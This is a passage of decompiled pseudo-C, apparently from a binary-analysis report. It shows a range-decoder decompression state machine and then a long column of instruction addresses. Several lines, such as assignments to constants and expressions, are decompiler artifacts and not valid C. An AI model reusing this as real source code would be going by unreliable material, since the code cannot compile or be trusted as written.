                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								goto L89;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x60);
                                                                                      							if( *(__ebp - 0x60) == 0) {
                                                                                      								goto L171;
                                                                                      							}
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                      							__eflags = _t258;
                                                                                      							0 | _t258 = _t258 + _t258 + 9;
                                                                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                      							goto L75;
                                                                                      						case 0xa:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 4);
                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                      							goto L88;
                                                                                      						case 0xb:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                      							} else {
                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                      							L88:
                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                      							L89:
                                                                                      							__eax =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x80) = 0x15;
                                                                                      							__eax =  *(__ebp - 4) + 0xa68;
                                                                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                      							goto L68;
                                                                                      						case 0xc:
                                                                                      							L99:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t334 = __ebp - 0x70;
                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t334;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                      							goto L101;
                                                                                      						case 0xd:
                                                                                      							goto L36;
                                                                                      						case 0xe:
                                                                                      							goto L45;
                                                                                      						case 0xf:
                                                                                      							goto L57;
                                                                                      						case 0x10:
                                                                                      							L109:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t365 = __ebp - 0x70;
                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t365;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							goto L111;
                                                                                      						case 0x11:
                                                                                      							L68:
                                                                                      							__esi =  *(__ebp - 0x58);
                                                                                      							 *(__ebp - 0x84) = 0x12;
                                                                                      							goto L132;
                                                                                      						case 0x12:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                      								goto L132;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							__eflags = __eax;
                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                      							goto L130;
                                                                                      						case 0x13:
                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                      								_t469 = __ebp - 0x58;
                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                      								__eflags =  *_t469;
                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                      								L144:
                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                      								goto L145;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                      							L130:
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                      							goto L144;
                                                                                      						case 0x14:
                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                      							goto L140;
                                                                                      						case 0x15:
                                                                                      							__eax = 0;
                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                      							__al = __al & 0x000000fd;
                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                      							goto L120;
                                                                                      						case 0x16:
                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                      							__eflags = __eax - 4;
                                                                                      							if(__eax >= 4) {
                                                                                      								_push(3);
                                                                                      								_pop(__eax);
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 4);
                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                      							__eax = __eax << 7;
                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                      							goto L145;
                                                                                      						case 0x17:
                                                                                      							L145:
                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                      							goto L149;
                                                                                      						case 0x18:
                                                                                      							L146:
                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							_t484 = __ebp - 0x70;
                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                      							__eflags =  *_t484;
                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                      							L148:
                                                                                      							_t487 = __ebp - 0x48;
                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                      							__eflags =  *_t487;
                                                                                      							L149:
                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                      								0 = 1;
                                                                                      								__eax = 1 << __cl;
                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								goto L140;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                      							__esi = __edx + __eax;
                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                      							__ax =  *__esi;
                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                      								__cx = __ax;
                                                                                      								__cx = __ax >> 5;
                                                                                      								__eax = __eax - __ecx;
                                                                                      								__edx = __edx + 1;
                                                                                      								__eflags = __edx;
                                                                                      								 *__esi = __ax;
                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                      							} else {
                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                      								0x800 = 0x800 - __edi;
                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      								 *__esi = __cx;
                                                                                      							}
                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      								goto L148;
                                                                                      							} else {
                                                                                      								goto L146;
                                                                                      							}
                                                                                      						case 0x19:
                                                                                      							__eflags = __ebx - 4;
                                                                                      							if(__ebx < 4) {
                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                      								L119:
                                                                                      								_t393 = __ebp - 0x2c;
                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                      								__eflags =  *_t393;
                                                                                      								L120:
                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax;
                                                                                      								if(__eax == 0) {
                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                      									goto L170;
                                                                                      								}
                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                      									goto L171;
                                                                                      								}
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                      								_t400 = __ebp - 0x60;
                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                      								__eflags =  *_t400;
                                                                                      								goto L123;
                                                                                      							}
                                                                                      							__ecx = __ebx;
                                                                                      							__eax = __ebx;
                                                                                      							__ecx = __ebx >> 1;
                                                                                      							__eax = __ebx & 0x00000001;
                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                      							__al = __al | 0x00000002;
                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                      							__eflags = __ebx - 0xe;
                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                      							if(__ebx >= 0xe) {
                                                                                      								__ebx = 0;
                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                      								L102:
                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                      									__eax = __eax + __ebx;
                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                      									__eax =  *(__ebp - 4);
                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                      									__eflags = __eax;
                                                                                      									L108:
                                                                                      									__ebx = 0;
                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                      									L112:
                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                      										_t391 = __ebp - 0x2c;
                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                      										__eflags =  *_t391;
                                                                                      										goto L119;
                                                                                      									}
                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                      									__esi = __edi + __eax;
                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                      									__ax =  *__esi;
                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                      										__ecx = 0;
                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                      										__ecx = 1;
                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                      										__ebx = 1;
                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                      										__ebx = 1 << __cl;
                                                                                      										__ecx = 1 << __cl;
                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                      										__cx = __ax;
                                                                                      										__cx = __ax >> 5;
                                                                                      										__eax = __eax - __ecx;
                                                                                      										__edi = __edi + 1;
                                                                                      										__eflags = __edi;
                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                      										 *__esi = __ax;
                                                                                      										 *(__ebp - 0x50) = __edi;
                                                                                      									} else {
                                                                                      										 *(__ebp - 0x10) = __edx;
                                                                                      										0x800 = 0x800 - __ecx;
                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                      										 *__esi = __dx;
                                                                                      									}
                                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      										L111:
                                                                                      										_t368 = __ebp - 0x48;
                                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                      										__eflags =  *_t368;
                                                                                      										goto L112;
                                                                                      									} else {
                                                                                      										goto L109;
                                                                                      									}
                                                                                      								}
                                                                                      								__ecx =  *(__ebp - 0xc);
                                                                                      								__ebx = __ebx + __ebx;
                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                      									__ecx =  *(__ebp - 0x10);
                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                      									__eflags = __ebx;
                                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                                      								}
                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                      									L101:
                                                                                      									_t338 = __ebp - 0x48;
                                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                      									__eflags =  *_t338;
                                                                                      									goto L102;
                                                                                      								} else {
                                                                                      									goto L99;
                                                                                      								}
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 4);
                                                                                      							__eax = __eax - __ebx;
                                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                      							goto L108;
                                                                                      						case 0x1a:
                                                                                      							goto L55;
                                                                                      						case 0x1b:
                                                                                      							L75:
                                                                                      							__eflags =  *(__ebp - 0x64);
                                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                                      								 *(__ebp - 0x88) = 0x1b;
                                                                                      								goto L170;
                                                                                      							}
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      							__eflags = __eax -  *(__ebp - 0x74);
                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                      								__eflags = __eax;
                                                                                      							}
                                                                                      							__edx =  *(__ebp - 8);
                                                                                      							__cl =  *(__eax + __edx);
                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                      							 *(__ebp - 0x5c) = __cl;
                                                                                      							 *(__eax + __edx) = __cl;
                                                                                      							__eax = __eax + 1;
                                                                                      							__edx = 0;
                                                                                      							_t274 = __eax %  *(__ebp - 0x74);
                                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                                      							__edx = _t274;
                                                                                      							__eax =  *(__ebp - 0x68);
                                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      							_t283 = __ebp - 0x64;
                                                                                      							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                      							__eflags =  *_t283;
                                                                                      							 *( *(__ebp - 0x68)) = __cl;
                                                                                      							goto L79;
                                                                                      						case 0x1c:
                                                                                      							while(1) {
                                                                                      								L123:
                                                                                      								__eflags =  *(__ebp - 0x64);
                                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                                      									break;
                                                                                      								}
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                      									__eflags = __eax;
                                                                                      								}
                                                                                      								__edx =  *(__ebp - 8);
                                                                                      								__cl =  *(__eax + __edx);
                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                                      								 *(__eax + __edx) = __cl;
                                                                                      								__eax = __eax + 1;
                                                                                      								__edx = 0;
                                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                                      								__edx = _t414;
                                                                                      								__eax =  *(__ebp - 0x68);
                                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                      								__eflags =  *(__ebp - 0x30);
                                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                                      								 *(__ebp - 0x14) = __edx;
                                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                                      									continue;
                                                                                      								} else {
                                                                                      									goto L80;
                                                                                      								}
                                                                                      							}
                                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                                      							goto L170;
                                                                                      					}
                                                                                      				}
                                                                                      			}













                                                                                      0x00000000
                                                                                      0x00406d5f
                                                                                      0x00406d5f
                                                                                      0x00406d64
                                                                                      0x00406ddb
                                                                                      0x00406de2
                                                                                      0x00406dec
                                                                                      0x004073cb
                                                                                      0x004073cb
                                                                                      0x004073ce
                                                                                      0x004073ce
                                                                                      0x004073d4
                                                                                      0x004073da
                                                                                      0x004073e0
                                                                                      0x004073fa
                                                                                      0x004073fd
                                                                                      0x00407403
                                                                                      0x0040740e
                                                                                      0x00407410
                                                                                      0x004073e2
                                                                                      0x004073e2
                                                                                      0x004073f1
                                                                                      0x004073f5
                                                                                      0x004073f5
                                                                                      0x0040741a
                                                                                      0x00407441
                                                                                      0x00407441
                                                                                      0x00407447
                                                                                      0x00407447
                                                                                      0x00000000
                                                                                      0x0040741c
                                                                                      0x0040741c
                                                                                      0x00407420
                                                                                      0x004075cf
                                                                                      0x00000000
                                                                                      0x004075cf
                                                                                      0x0040742c
                                                                                      0x00407433
                                                                                      0x0040743b
                                                                                      0x0040743e
                                                                                      0x00000000
                                                                                      0x0040743e
                                                                                      0x00406d66
                                                                                      0x00406d66
                                                                                      0x00406d6a
                                                                                      0x00406d72
                                                                                      0x00406d75
                                                                                      0x00406d77
                                                                                      0x00406d7a
                                                                                      0x00406d7c
                                                                                      0x00406d81
                                                                                      0x00406d84
                                                                                      0x00406d8b
                                                                                      0x00406d92
                                                                                      0x00406d95
                                                                                      0x00406da0
                                                                                      0x00406da8
                                                                                      0x00406da8
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406da2
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406d97
                                                                                      0x00406daf
                                                                                      0x00406dcd
                                                                                      0x00406dcf
                                                                                      0x00406fa2
                                                                                      0x00406fa2
                                                                                      0x00406fa5
                                                                                      0x00406fa8
                                                                                      0x00406fab
                                                                                      0x00406fae
                                                                                      0x00406fb1
                                                                                      0x00406fb4
                                                                                      0x00406fb7
                                                                                      0x00406fba
                                                                                      0x00406fc0
                                                                                      0x00406fd8
                                                                                      0x00406fdb
                                                                                      0x00406fde
                                                                                      0x00406fe1
                                                                                      0x00406fe1
                                                                                      0x00406fe4
                                                                                      0x00406fea
                                                                                      0x00406fc2
                                                                                      0x00406fc2
                                                                                      0x00406fca
                                                                                      0x00406fcf
                                                                                      0x00406fd1
                                                                                      0x00406fd3
                                                                                      0x00406fd3
                                                                                      0x00406ff4
                                                                                      0x00406ff7
                                                                                      0x00406f9a
                                                                                      0x00406fa0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ff9
                                                                                      0x00406f75
                                                                                      0x00406f79
                                                                                      0x00407581
                                                                                      0x00000000
                                                                                      0x00407581
                                                                                      0x00406f7f
                                                                                      0x00406f82
                                                                                      0x00406f85
                                                                                      0x00406f89
                                                                                      0x00406f8c
                                                                                      0x00406f92
                                                                                      0x00406f94
                                                                                      0x00406f94
                                                                                      0x00406f97
                                                                                      0x00000000
                                                                                      0x00406f97
                                                                                      0x00406db1
                                                                                      0x00406db1
                                                                                      0x00406db4
                                                                                      0x00406dba
                                                                                      0x00406dbc
                                                                                      0x00406dbc
                                                                                      0x00406dbf
                                                                                      0x00406dc2
                                                                                      0x00406dc4
                                                                                      0x00406dc5
                                                                                      0x00406dc8
                                                                                      0x00406e35
                                                                                      0x00406e35
                                                                                      0x00406e39
                                                                                      0x00406e3c
                                                                                      0x00406e3f
                                                                                      0x00406e42
                                                                                      0x00406e45
                                                                                      0x00406e46
                                                                                      0x00406e49
                                                                                      0x00406e4b
                                                                                      0x00406e51
                                                                                      0x00406e54
                                                                                      0x00406e57
                                                                                      0x00406e5a
                                                                                      0x00406e5d
                                                                                      0x00406e63
                                                                                      0x00406e7f
                                                                                      0x00406e82
                                                                                      0x00406e85
                                                                                      0x00406e88
                                                                                      0x00406e8f
                                                                                      0x00406e95
                                                                                      0x00406e99
                                                                                      0x00406e65
                                                                                      0x00406e65
                                                                                      0x00406e69
                                                                                      0x00406e71
                                                                                      0x00406e76
                                                                                      0x00406e78
                                                                                      0x00406e7a
                                                                                      0x00406e7a
                                                                                      0x00406ea3
                                                                                      0x00406ea6
                                                                                      0x00406e1d
                                                                                      0x00406e1d
                                                                                      0x00406e23
                                                                                      0x00406ed6
                                                                                      0x00406edc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406ede
                                                                                      0x00406ee1
                                                                                      0x00406ee4
                                                                                      0x00406ee7
                                                                                      0x00406eea
                                                                                      0x00406eed
                                                                                      0x00406ef0
                                                                                      0x00406ef3
                                                                                      0x00406ef6
                                                                                      0x00406efc
                                                                                      0x00406f14
                                                                                      0x00406f17
                                                                                      0x00406f1a
                                                                                      0x00406f1d
                                                                                      0x00406f1d
                                                                                      0x00406f20
                                                                                      0x00406f26
                                                                                      0x00406efe
                                                                                      0x00406efe
                                                                                      0x00406f06
                                                                                      0x00406f0b
                                                                                      0x00406f0d
                                                                                      0x00406f0f
                                                                                      0x00406f0f
                                                                                      0x00406f30
                                                                                      0x00406f33
                                                                                      0x00406eb1
                                                                                      0x00406eb5
                                                                                      0x00407575
                                                                                      0x00000000
                                                                                      0x00407575
                                                                                      0x00406ebb
                                                                                      0x00406ebe
                                                                                      0x00406ec1
                                                                                      0x00406ec5
                                                                                      0x00406ec8
                                                                                      0x00406ece
                                                                                      0x00406ed0
                                                                                      0x00406ed0
                                                                                      0x00406ed3
                                                                                      0x00406ed3
                                                                                      0x00406f33
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3a
                                                                                      0x00406f3e
                                                                                      0x00406f3e
                                                                                      0x00406f41
                                                                                      0x00406f44
                                                                                      0x00406f48
                                                                                      0x0040758d
                                                                                      0x00000000
                                                                                      0x0040758d
                                                                                      0x00406f4e
                                                                                      0x00406f51
                                                                                      0x00406f54
                                                                                      0x00406f57
                                                                                      0x00406f5a
                                                                                      0x00406f5d
                                                                                      0x00406f60
                                                                                      0x00406f62
                                                                                      0x00406f65
                                                                                      0x00406f68
                                                                                      0x00406f6b
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x00406f6d
                                                                                      0x0040710a
                                                                                      0x0040710a
                                                                                      0x0040710d
                                                                                      0x0040710d
                                                                                      0x00000000
                                                                                      0x0040710d
                                                                                      0x00406e2f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406eac
                                                                                      0x00406df8
                                                                                      0x00406dfc
                                                                                      0x00407569
                                                                                      0x004075e5
                                                                                      0x004075ed
                                                                                      0x004075f4
                                                                                      0x004075f6
                                                                                      0x004075fd
                                                                                      0x00407601
                                                                                      0x00407601
                                                                                      0x00406e02
                                                                                      0x00406e05
                                                                                      0x00406e08
                                                                                      0x00406e0c
                                                                                      0x00406e0f
                                                                                      0x00406e15
                                                                                      0x00406e17
                                                                                      0x00406e17
                                                                                      0x00406e1a
                                                                                      0x00000000
                                                                                      0x00406e1a
                                                                                      0x00406ea6
                                                                                      0x00406daf
                                                                                      0x00406be3
                                                                                      0x00406be3
                                                                                      0x00406bec
                                                                                      0x004075fa
                                                                                      0x004075fa
                                                                                      0x00000000
                                                                                      0x004075fa
                                                                                      0x00406bf2
                                                                                      0x00000000
                                                                                      0x00406bfd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c06
                                                                                      0x00406c09
                                                                                      0x00406c0c
                                                                                      0x00406c10
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c16
                                                                                      0x00406c19
                                                                                      0x00406c1b
                                                                                      0x00406c1c
                                                                                      0x00406c1f
                                                                                      0x00406c21
                                                                                      0x00406c22
                                                                                      0x00406c24
                                                                                      0x00406c27
                                                                                      0x00406c2c
                                                                                      0x00406c31
                                                                                      0x00406c3a
                                                                                      0x00406c4d
                                                                                      0x00406c50
                                                                                      0x00406c5c
                                                                                      0x00406c84
                                                                                      0x00406c86
                                                                                      0x00406c94
                                                                                      0x00406c94
                                                                                      0x00406c98
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c88
                                                                                      0x00406c8b
                                                                                      0x00406c8c
                                                                                      0x00406c8c
                                                                                      0x00000000
                                                                                      0x00406c88
                                                                                      0x00406c62
                                                                                      0x00406c67
                                                                                      0x00406c67
                                                                                      0x00406c70
                                                                                      0x00406c78
                                                                                      0x00406c7b
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c81
                                                                                      0x00000000
                                                                                      0x00406c9e
                                                                                      0x00406c9e
                                                                                      0x00406ca2
                                                                                      0x0040754e
                                                                                      0x00000000
                                                                                      0x0040754e
                                                                                      0x00406cab
                                                                                      0x00406cbb
                                                                                      0x00406cbe
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc1
                                                                                      0x00406cc4
                                                                                      0x00406cc8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00406cca
                                                                                      0x00406cd0
                                                                                      0x00406cfa
                                                                                      0x00406d00
                                                                                      0x00406d07
                                                                                      0x00000000
